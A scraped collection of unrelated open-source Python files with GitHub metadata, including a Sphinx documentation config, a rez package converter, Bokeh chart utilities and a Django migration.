result_dict = {
'xtl' : output['boundingBox']['left'],
'ytl' : output['boundingBox']['top'],
'width' : output['boundingBox']['width'],
'height' : output['boundingBox']['height'],
'class' : output['tagName'],
'confidence' : output['probability'],
}
result_list_.append(result_dict)
results_list_.append(result_list_)
if len(results_list_) != len(gpath_list):
raise ValueError('Azure did not return valid data')
results_list = zip(gpath_list, results_list_)
return results_list
| {
"content_hash": "9a1c3fed419ba405589c23818aa49d3b",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 129,
"avg_line_length": 36.33582089552239,
"alnum_prop": 0.6553707126720065,
"repo_name": "Erotemic/ibeis",
"id": "9afd9abcdce88352a5f11c4e6e50546f3617f1ec",
"size": "4893",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "ibeis/algo/detect/azure.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "331"
},
{
"name": "CSS",
"bytes": "4676"
},
{
"name": "Dockerfile",
"bytes": "13018"
},
{
"name": "Inno Setup",
"bytes": "1585"
},
{
"name": "Python",
"bytes": "6661573"
},
{
"name": "Shell",
"bytes": "56171"
}
],
"symlink_target": ""
} |
from collections import defaultdict
import numpy as np
class DataLoader:
def __init__(self):
self.chars = set()
lines = []
for l in open('./kaomojis'):
self.chars |= set(l[:-1])
lines.append(l[:-1])
self.char_to_idx = { c:i for i,c in enumerate(self.chars) }
self.idx_to_char = { i:c for i,c in enumerate(self.chars) }
self.char_vecs = []
words_num = len(self.chars)
for line in lines:
char_vec = [self.char_to_idx[c] for c in line]
input_vec = [self._one_hot_vec(words_num+1, idx) for idx in char_vec]
output_vec = [self._one_hot_vec(words_num+1, idx) for idx
in char_vec[1:] + [words_num]]
self.char_vecs.append((input_vec, output_vec))
def _one_hot_vec(self, length, char_idx):
vec = np.zeros((length, 1))
vec[char_idx] = 1.0
return vec
| {
"content_hash": "69ab43a58cef054b3985557db89954f0",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 93,
"avg_line_length": 33.241379310344826,
"alnum_prop": 0.5186721991701245,
"repo_name": "yustoris/kaomoji_with_rnn",
"id": "860cce21771cf34a0031fa6c291a7a958fe137aa",
"size": "964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "data_loader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "6743"
}
],
"symlink_target": ""
} |
import sys
import os
import shlex
import subprocess
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['breathe']
breathe_projects = {'pybind11': '.build/doxygenxml/'}
breathe_default_project = 'pybind11'
breathe_domain_by_extension = {'h': 'cpp'}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'pybind11'
copyright = '2017, Wenzel Jakob'
author = 'Wenzel Jakob'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.5'
# The full version, including alpha/beta/rc tags.
release = '2.5.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['.build', 'release.rst']
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'any'
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
#pygments_style = 'monokai'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_context = {
'css_files': [
'_static/theme_overrides.css'
]
}
else:
html_context = {
'css_files': [
'//media.readthedocs.org/css/sphinx_rtd_theme.css',
'//media.readthedocs.org/css/readthedocs-doc-embed.css',
'_static/theme_overrides.css'
]
}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pybind11doc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
'preamble': '\DeclareUnicodeCharacter{00A0}{}',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pybind11.tex', 'pybind11 Documentation',
'Wenzel Jakob', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = 'pybind11-logo.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pybind11', 'pybind11 Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pybind11', 'pybind11 Documentation',
author, 'pybind11', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
primary_domain = 'cpp'
highlight_language = 'cpp'
def generate_doxygen_xml(app):
build_dir = os.path.join(app.confdir, '.build')
if not os.path.exists(build_dir):
os.mkdir(build_dir)
try:
subprocess.call(['doxygen', '--version'])
retcode = subprocess.call(['doxygen'], cwd=app.confdir)
if retcode < 0:
sys.stderr.write("doxygen error code: {}\n".format(-retcode))
except OSError as e:
sys.stderr.write("doxygen execution failed: {}\n".format(e))
def setup(app):
"""Add hook for building doxygen xml when needed"""
app.connect("builder-inited", generate_doxygen_xml)
| {
"content_hash": "c10c9f194f2a47dcb8c6cf2a47099bfb",
"timestamp": "",
"source": "github",
"line_count": 317,
"max_line_length": 79,
"avg_line_length": 32.22397476340694,
"alnum_prop": 0.6926089084679393,
"repo_name": "BYVoid/OpenCC",
"id": "fa6332de5209efc6b75c65ae42877f798850da77",
"size": "10659",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "deps/pybind11-2.5.0/docs/conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1195"
},
{
"name": "C",
"bytes": "689"
},
{
"name": "C++",
"bytes": "215008"
},
{
"name": "CMake",
"bytes": "15826"
},
{
"name": "JavaScript",
"bytes": "7133"
},
{
"name": "Makefile",
"bytes": "2528"
},
{
"name": "Python",
"bytes": "21569"
},
{
"name": "Shell",
"bytes": "2247"
},
{
"name": "TypeScript",
"bytes": "912"
}
],
"symlink_target": ""
} |
"""
Functions for converting python distributions to rez packages.
"""
from __future__ import print_function
from rez.exceptions import RezSystemError
import pkg_resources
import shutil
import sys
import os
import os.path
import textwrap
def _mkdirs(*dirs):
path = os.path.join(*dirs)
if not os.path.exists(path):
os.makedirs(path)
return path
def convert_name(name):
""" Convert a python distribution name into a rez-safe package name."""
return name.replace('-', '_')
# TODO: change this when version submod is rewritten
# This is just a temporary simplistic implementation for now
def convert_version(version):
"""Convert a python distribution version into a rez-safe version string."""
"""
version = version.replace('-','.')
version = version.lower()
version = re.sub("[a-z]", "", version)
version = version.replace("..", '.')
version = version.replace("..", '.')
version = version.replace("..", '.')
return version
"""
return str(version)
# TODO: add native Requirement conversion support into new version submod
def convert_requirement(req):
"""
Converts a pkg_resources.Requirement object into a list of Rez package
request strings.
"""
pkg_name = convert_name(req.project_name)
if not req.specs:
return [pkg_name]
req_strs = []
for spec in req.specs:
op, ver = spec
ver = convert_version(ver)
if op == "<":
r = "%s-0+<%s" % (pkg_name, ver)
req_strs.append(r)
elif op == "<=":
r = "%s-0+<%s|%s" % (pkg_name, ver, ver)
req_strs.append(r)
elif op == "==":
r = "%s-%s" % (pkg_name, ver)
req_strs.append(r)
elif op == ">=":
r = "%s-%s+" % (pkg_name, ver)
req_strs.append(r)
elif op == ">":
r1 = "%s-%s+" % (pkg_name, ver)
r2 = "!%s-%s" % (pkg_name, ver)
req_strs.append(r1)
req_strs.append(r2)
elif op == "!=":
r = "!%s-%s" % (pkg_name, ver)
req_strs.append(r)
else:
print("Warning: Can't understand op '%s', just depending on "
"unversioned package..." % op,
file=sys.stderr)
req_strs.append(pkg_name)
return req_strs
def get_dist_dependencies(name, recurse=True):
"""
Get the dependencies of the given, already installed distribution.
@param recurse If True, recursively find all dependencies.
@returns A set of package names.
@note The first entry in the list is always the top-level package itself.
"""
dist = pkg_resources.get_distribution(name)
pkg_name = convert_name(dist.project_name)
reqs = set()
working = set([dist])
depth = 0
while working:
deps = set()
for distname in working:
dist = pkg_resources.get_distribution(distname)
pkg_name = convert_name(dist.project_name)
reqs.add(pkg_name)
for req in dist.requires():
reqs_ = convert_requirement(req)
deps |= set(x.split('-', 1)[0] for x in reqs_
if not x.startswith('!'))
working = deps - reqs
depth += 1
if (not recurse) and (depth >= 2):
break
return reqs
# TODO: doesn't deal with executable scripts yet
def convert_dist(name, dest_path, make_variant=True, ignore_dirs=None,
python_requirement="major_minor"):
"""Convert an already installed python distribution into a rez package.
Args:
dest_path (str): Where to put the rez package. The package will be
created under dest_path/<NAME>/<VERSION>/.
make_variant (bool): If True, makes a single variant in the rez package
based on the MAJOR.MINOR version of python.
ignore_dirs (bool): List of directory names to not copy from the dist.
python_requirement (str): How the package should depend on python.
One of:
- "major": depend on python-X
- "major_minor": depend on python-X.X
- any other value: this string is used as the literal version
range string.
Returns:
Install path of the new Rez package.
"""
dist = pkg_resources.get_distribution(name)
pkg_name = convert_name(dist.project_name)
pkg_version = convert_version(dist.version)
if python_requirement == "major":
pyver = str(sys.version_info[0])
elif python_requirement == "major_minor":
pyver = '.'.join(str(x) for x in sys.version_info[:2])
else:
pyver = python_requirement
pypkg = "python-%s" % pyver
pkg_requires = []
if not make_variant:
pkg_requires.append(pypkg)
for req in dist.requires():
pkg_requires += convert_requirement(req)
pkg_path = _mkdirs(dest_path, pkg_name, pkg_version)
pkg_file = os.path.join(pkg_path, "package.py")
root_path = _mkdirs(pkg_path, pypkg) if make_variant else pkg_path
basename = os.path.basename(dist.location)
is_egg = (os.path.splitext(basename)[1] == ".egg")
if os.path.isdir(dist.location):
if is_egg:
# this is an egg-dir
for file in os.listdir(dist.location):
fpath = os.path.join(dist.location, file)
if os.path.isfile(fpath):
shutil.copy(fpath, root_path)
else:
shutil.copytree(fpath, os.path.join(root_path, file),
ignore=shutil.ignore_patterns(ignore_dirs))
else:
# this is a site dir
egginfo_dir = "%s.egg-info" % dist.egg_name()
eggpath = os.path.join(dist.location, egginfo_dir)
file = os.path.join(eggpath, "installed-files.txt")
if not os.path.isfile(file):
raise RezSystemError(
"There is not enough information on disk to convert the "
"python distribution '%s' into a Rez package. The distribution "
"is installed to a common site, but the installed file "
"information is not present." % name)
with open(file) as f:
installed_files = f.read().strip().split()
dirs = set()
files = set()
for file in installed_files:
path = os.path.join(eggpath, file)
path = os.path.realpath(path)
if os.path.isfile(path) and path.startswith(dist.location + os.sep):
dir_ = os.path.dirname(path)
if ignore_dirs:
reldir = os.path.relpath(dir_, dist.location)
if set(reldir.split(os.sep)) & set(ignore_dirs):
continue
files.add(path)
dirs.add(dir_)
def _dst(p):
dst = os.path.relpath(p, dist.location)
dst = os.path.join(root_path, dst)
return os.path.realpath(dst)
for dir_ in dirs:
dst_dir = _dst(dir_)
_mkdirs(dst_dir)
for file in files:
dst_file = _dst(file)
shutil.copy(file, dst_file)
else:
# this is an egg-file
import zipfile
assert is_egg and os.path.isfile(dist.location)
assert zipfile.is_zipfile(dist.location)
z = zipfile.ZipFile(dist.location)
z.extractall(root_path)
variants_str = "[['%s']]" % pypkg if make_variant else ''
content = textwrap.dedent(
"""
config_version = 0
name = '%(name)s'
version = '%(version)s'
%(variants)s
requires = %(requires)s
def commands():
env.PYTHONPATH.append('{this.root}')
""" % dict(
name=pkg_name,
version=pkg_version,
variants=variants_str,
requires=str(pkg_requires)))
content = content.strip() + '\n'
with open(pkg_file, 'w') as f:
f.write(content)
return pkg_path
| {
"content_hash": "7d41d8c03f5aa817c1599c6ed56a7ac3",
"timestamp": "",
"source": "github",
"line_count": 248,
"max_line_length": 84,
"avg_line_length": 33.068548387096776,
"alnum_prop": 0.5511522985001829,
"repo_name": "nerdvegas/rez",
"id": "904a378709da5d232e9fd26fc1c763030f0d9d16",
"size": "8285",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/rez/utils/py_dist.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "13"
},
{
"name": "CMake",
"bytes": "61812"
},
{
"name": "Dockerfile",
"bytes": "3668"
},
{
"name": "PowerShell",
"bytes": "1390"
},
{
"name": "Python",
"bytes": "1950470"
},
{
"name": "Shell",
"bytes": "3185"
}
],
"symlink_target": ""
} |
""" This is the utils module that collects convenience functions and code that are
useful for charts ecosystem.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
from collections import OrderedDict
import itertools
from math import cos, sin
from ..browserlib import view
from ..document import Document
from ..embed import file_html
from ..models import GlyphRenderer
from ..models.glyphs import (
Asterisk, Circle, CircleCross, CircleX, Cross, Diamond, DiamondCross,
InvertedTriangle, Square, SquareCross, SquareX, Triangle, X)
from ..resources import INLINE
from ..util.notebook import publish_display_data
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
# TODO: (bev) this should go in a plotting utils one level up
_default_cycle_palette = [
"#f22c40", "#5ab738", "#407ee7", "#df5320", "#00ad9c", "#c33ff3"
]
def cycle_colors(chunk, palette=_default_cycle_palette):
""" Build a color list just cycling through a given palette.
Args:
chuck (seq): the chunk of elements to generate the color list
palette (seq[color]) : a palette of colors to cycle through
Returns:
colors
"""
colors = []
g = itertools.cycle(palette)
for i in range(len(chunk)):
colors.append(next(g))
return colors
# TODO: (bev) this should go in a plotting utils one level up
def make_scatter(source, x, y, markertype, color, line_color=None,
size=10, fill_alpha=0.2, line_alpha=1.0):
"""Create a marker glyph and appends it to the renderers list.
Args:
source (obj): datasource object containing markers references.
x (str or list[float]) : values or field names of line ``x`` coordinates
y (str or list[float]) : values or field names of line ``y`` coordinates
markertype (int or str): Marker type to use (e.g., 2, 'circle', etc.)
color (str): color of the points
size (int) : size of the scatter marker
fill_alpha(float) : alpha value of the fill color
line_alpha(float) : alpha value of the line color
Return:
scatter: Marker Glyph instance
"""
if line_color is None:
line_color = color
_marker_types = OrderedDict(
[
("circle", Circle),
("square", Square),
("triangle", Triangle),
("diamond", Diamond),
("inverted_triangle", InvertedTriangle),
("asterisk", Asterisk),
("cross", Cross),
("x", X),
("circle_cross", CircleCross),
("circle_x", CircleX),
("square_x", SquareX),
("square_cross", SquareCross),
("diamond_cross", DiamondCross),
]
)
g = itertools.cycle(_marker_types.keys())
if isinstance(markertype, int):
for i in range(markertype):
shape = next(g)
else:
shape = markertype
glyph = _marker_types[shape](
x=x, y=y, size=size, fill_color=color, fill_alpha=fill_alpha,
line_color=line_color, line_alpha=line_alpha
)
return GlyphRenderer(data_source=source, glyph=glyph)
def chunk(l, n):
"""Yield successive n-sized chunks from l.
Args:
l (list: the incomming list to be chunked
n (int): lenght of you chucks
"""
for i in range(0, len(l), n):
yield l[i:i + n]
def polar_to_cartesian(r, start_angles, end_angles):
"""Translate polar coordinates to cartesian.
Args:
r (float): radial coordinate
start_angles (list(float)): list of start angles
end_angles (list(float)): list of end_angles angles
Returns:
x, y points
"""
cartesian = lambda r, alpha: (r*cos(alpha), r*sin(alpha))
points = []
for start, end in zip(start_angles, end_angles):
points.append(cartesian(r, (end + start)/2))
return zip(*points)
# TODO: Experimental implementation. This should really be a shared
# pattern between plotting/charts and other bokeh interfaces.
# This will probably be part of the future charts re-design
# to make them inherit from plot (or at least be closer to).
# In this was both charts and plotting could share figure,
# show, save, push methods as well as VBox, etc...
class Figure(object):
def __init__(self, *charts, **kwargs):
self.filename = kwargs.pop('filename', None)
self.server = kwargs.pop('server', None)
self.notebook = kwargs.pop('notebook', None)
self.title = kwargs.pop('title', '')
self.children = kwargs.pop('children', None)
self.charts = charts
self.doc = Document()
self.doc.hold(True)
self._plots = []
# if self.server:
# self.session = Session()
# self.session.use_doc(self.server)
# self.session.load_document(self.doc)
if self.children:
from bokeh.models import VBox
self.doc.add(VBox(children=self.children))
self.plot = None
for i, chart in enumerate(self.charts):
chart.doc = self.doc
if self.server:
chart.session = self.session
# Force the chart to create the underlying plot
chart._setup_show()
chart._prepare_show()
chart._show_teardown()
if not self.title:
self.title = chart.chart.title
self._plots += chart.chart._plots
# reset the pot title with the one set for the Figure
self.doc._current_plot.title = self.title
def show(self):
"""Main show function.
It shows the Figure in file, server and notebook outputs.
"""
show(self, self.title, self.filename, self.server, self.notebook)
def show(obj, title='test', filename=False, server=False, notebook=False, **kws):
""" 'shows' a plot object, by auto-raising the window or tab
displaying the current plot (for file/server output modes) or displaying
it in an output cell (IPython notebook).
Args:
obj (Widget/Plot object, optional): it accepts a plot object and just shows it.
"""
if filename:
if filename is True:
filename = "untitled"
else:
filename = filename
with open(filename, "w") as f:
f.write(file_html(obj.doc, INLINE, title))
print("Wrote %s" % filename)
view(filename)
elif filename is False and server is False and notebook is False:
print("You have to provide a filename (filename='foo.html' or"
" .filename('foo.html')) to save your plot.")
if server:
obj.session.store_document(obj.doc)
link = obj.session.object_link(obj.doc.context)
view(link)
if notebook:
from bokeh.embed import notebook_div
for plot in obj._plots:
publish_display_data({'text/html': notebook_div(plot)})
| {
"content_hash": "5298d89ade63ddb5e8ad69864059e52b",
"timestamp": "",
"source": "github",
"line_count": 225,
"max_line_length": 87,
"avg_line_length": 33.71111111111111,
"alnum_prop": 0.5774555042847725,
"repo_name": "gpfreitas/bokeh",
"id": "52637502dfcb537d2783b6e1b6f229e1a972c260",
"size": "7585",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bokeh/_legacy_charts/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5455"
},
{
"name": "CSS",
"bytes": "413470"
},
{
"name": "CoffeeScript",
"bytes": "2117773"
},
{
"name": "HTML",
"bytes": "72852"
},
{
"name": "JavaScript",
"bytes": "7337"
},
{
"name": "Makefile",
"bytes": "5785"
},
{
"name": "Python",
"bytes": "1560447"
},
{
"name": "Shell",
"bytes": "18109"
}
],
"symlink_target": ""
} |
from django.db import migrations
def clear_results_with_u_prefix(apps, schema_editor):
Scenario = apps.get_model('modeling', 'Scenario')
for scenario in Scenario.objects.filter(results__contains="[{u'"):
scenario.results = "[]"
scenario.save()
class Migration(migrations.Migration):
dependencies = [
('modeling', '0008_delete_district'),
]
# https://docs.djangoproject.com/en/1.8/topics/migrations/#data-migrations
operations = [
migrations.RunPython(clear_results_with_u_prefix)
]
| {
"content_hash": "407ab93c0f610579ef7f39c0fc35df2a",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 78,
"avg_line_length": 27.4,
"alnum_prop": 0.666058394160584,
"repo_name": "WikiWatershed/model-my-watershed",
"id": "44cd30aca7bbd8afb5d115e3acfa1522b7748c87",
"size": "572",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "src/mmw/apps/modeling/migrations/0009_scenario_results_to_json.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CartoCSS",
"bytes": "11602"
},
{
"name": "HTML",
"bytes": "1312164"
},
{
"name": "JavaScript",
"bytes": "2286872"
},
{
"name": "Jinja",
"bytes": "8016"
},
{
"name": "Python",
"bytes": "859002"
},
{
"name": "Ruby",
"bytes": "1248"
},
{
"name": "SCSS",
"bytes": "411655"
},
{
"name": "Shell",
"bytes": "20014"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.